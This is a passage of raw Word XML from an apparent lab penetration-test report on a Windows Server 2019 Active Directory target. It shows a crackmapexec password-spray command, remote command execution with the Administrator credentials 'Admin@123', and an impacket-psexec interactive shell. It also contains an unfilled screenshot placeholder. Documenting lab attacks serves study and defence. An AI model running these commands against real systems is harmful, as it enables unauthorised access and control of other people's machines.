    </w:p>
    <w:p w14:paraId="3C4E8830" w14:textId="146EAA83" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5.3.1 Initial Access via Password Spraying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCB6557" w14:textId="17C67B09" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Credential-based attack against the Windows Server 2019 Active Directory infrastructure commenced with username enumeration followed by password spraying techniques [2</w:t>
      </w:r>
      <w:r w:rsidR="00424DAD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20528208" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Password Spraying Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Utilising</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CrackMapExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> for distributed authentication attempts against identified user accounts with commonly employed passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18533524" w14:textId="1BB7895F" w:rsidR="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.227.13</w:t>
      </w:r>
      <w:r w:rsidR="00515A10">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u users.txt -p Password</w:t>
      </w:r>
      <w:r w:rsidR="00D67D43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> --continue-on-success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A9479F" w14:textId="77777777" w:rsidR="00D67D43" w:rsidRDefault="00D67D43" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D0C9F7" w14:textId="1623636A" w:rsidR="00D67D43" w:rsidRPr="00A000BA" w:rsidRDefault="00D67D43" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67D43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66A99C0B" wp14:editId="136F1280">
            <wp:extent cx="5943600" cy="1678305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1568874616" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BB3C654-8F5B-4A58-8119-CA6BB0019F4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8874616" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1678305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="334FE789" w14:textId="148D5935" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5.3.2 Remote Access via SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7235AF" w14:textId="32E8A34F" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Validated credentials facilitated remote administrative access through SMB protocol </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>utilising</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-style command execution [2</w:t>
      </w:r>
      <w:r w:rsidR="004F48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078235EC" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Command Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B4CD1" w14:textId="59D3683B" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.227.13</w:t>
      </w:r>
      <w:r w:rsidR="00D67D43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:r w:rsidR="0093252F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-p '</w:t>
      </w:r>
      <w:r w:rsidR="0093252F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Admin@123</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>' -x '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9EBC9A" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[Insert Screenshot Here — Remote command execution showing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>abcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>jsmith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> user context]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB62F26" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Interactive Shell Establishment</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3B780E" w14:textId="004DAEB0" w:rsidR="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>impacket-psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>abcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00B16175">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Ad</w:t>
      </w:r>
      <w:r w:rsidR="001F5F36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ministrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:'</w:t>
      </w:r>
      <w:r w:rsidR="00B16175">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Admin@123</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'@192.168.227.13</w:t>
      </w:r>
      <w:r w:rsidR="001F5F36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A729E6" w14:textId="77777777" w:rsidR="00D038B0" w:rsidRDefault="00D038B0" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="144D6134" w14:textId="345F02D0" w:rsidR="00A000BA" w:rsidRPr="00027FDF" w:rsidRDefault="00D038B0" w:rsidP="004F019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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D038B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="054B6697" wp14:editId="083832C9">
            <wp:extent cx="5943600" cy="1586230"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="423930944" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B60DB6F2-B1A3-42F1-AA36-7E2757D2A71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3930944" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1586230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
